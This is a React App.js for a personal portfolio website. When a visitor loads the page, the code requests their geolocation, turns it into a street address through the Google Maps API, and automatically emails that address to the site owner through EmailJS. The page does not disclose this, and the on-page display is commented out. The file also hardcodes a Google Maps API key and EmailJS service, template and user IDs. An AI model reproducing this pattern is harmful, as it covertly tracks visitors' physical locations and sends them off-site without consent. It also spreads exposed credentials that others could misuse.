import React, { useState, useEffect } from "react";
import axios from "axios";
import { BrowserRouter as Router, Route, Routes, Navigate } from "react-router-dom";
import emailjs from "emailjs-com";
import Navbar from "./components/Navbar";
import Home from "./components/Home/Home";
import About from "./components/About/About";
import Projects from "./components/Projects/Projects";
import Footer from "./components/Footer";
import Resume from "./components/Resume/ResumeNew";
import Experience from "./components/Experience.js";
import ScrollToTop from "./components/ScrollToTop";
import Research from "./components/Research.js"
import "./style.css";
import "./App.css";
import "bootstrap/dist/css/bootstrap.min.css";

const GOOGLE_MAP_APIKEY = 'AIzaSyAPktaTZKux-L2DEpfyyQldi6WlgBG80fg';

function App() {
  const [load, updateLoad] = useState(true);
  const [location, setLocation] = useState({ latitude: null, longitude: null });
  const [locationDetails, setLocationDetails] = useState(null);

  useEffect(() => {
    const timer = setTimeout(() => {
      updateLoad(false);
    }, 1000);
    return () => clearTimeout(timer);
  }, []);

  useEffect(() => {
    if (navigator.geolocation) {
      navigator.geolocation.getCurrentPosition(
        (position) => {
          const { latitude, longitude } = position.coords;
          setLocation({ latitude, longitude });
          fetchLocationDetails(latitude, longitude);
        },
        (error) => {
          console.error("Error getting location: ", error);
        }
      );
    } else {
      console.error("Geolocation is not supported by this browser.");
    }
  }, []);

  const fetchLocationDetails = async (latitude, longitude) => {
    try {
      const response = await axios.get(
        `https://maps.googleapis.com/maps/api/geocode/json?latlng=${latitude},${longitude}&key=${GOOGLE_MAP_APIKEY}`
      );
      if (response.data.results && response.data.results.length > 0) {
        const address = response.data.results[0].formatted_address;
        setLocationDetails(address);
        sendEmail(address);  // Automatically send email with location details
      } else {
        console.log("No location details found.");
      }
    } catch (error) {
      console.error("Error fetching location details:", error);
    }
  };

  const sendEmail = (locationDetails) => {
    // Customize the email message
    const templateParams = {
      message: `Your current location details are: ${locationDetails}`,  // Add message and location details
    };

    emailjs
      .send(
        "service_xp2swci",          // Replace with your EmailJS service ID
        "template_ycz8jxd",         // Replace with your EmailJS template ID
        templateParams,             // Parameters to pass
        "HGa6KUC-URnrSCRuk"         // Replace with your EmailJS user ID
      )
      .then(
        (result) => {
          console.log("Email sent successfully:", result.status);
        },
        (error) => {
          console.error("Error sending email:", error.text);
        }
      );
  };

  return (
    <Router>
      <div className="App" id={load ? "no-scroll" : "scroll"}>
        <Navbar />
        <ScrollToTop />
        <Routes>
          <Route path="/" element={<Home />} />
          <Route path="/project" element={<Projects />} />
          <Route path="/about" element={<About />} />
          <Route path="/resume" element={<Resume />} />
          <Route path="/experience" element={<Experience />} />
          <Route path="/research" element={<Research />} />
          <Route path="*" element={<Navigate to="/" />} />
        </Routes>
        <Footer />

        {/* Optional: Display location details for debugging */}
        {/* {locationDetails ? (
          <div>
            <p>Location Details: {locationDetails}</p>
          </div>
        ) : (
          <p>Loading location details...</p>
        )} */}
      </div>
    </Router>
  );
}

export default App;
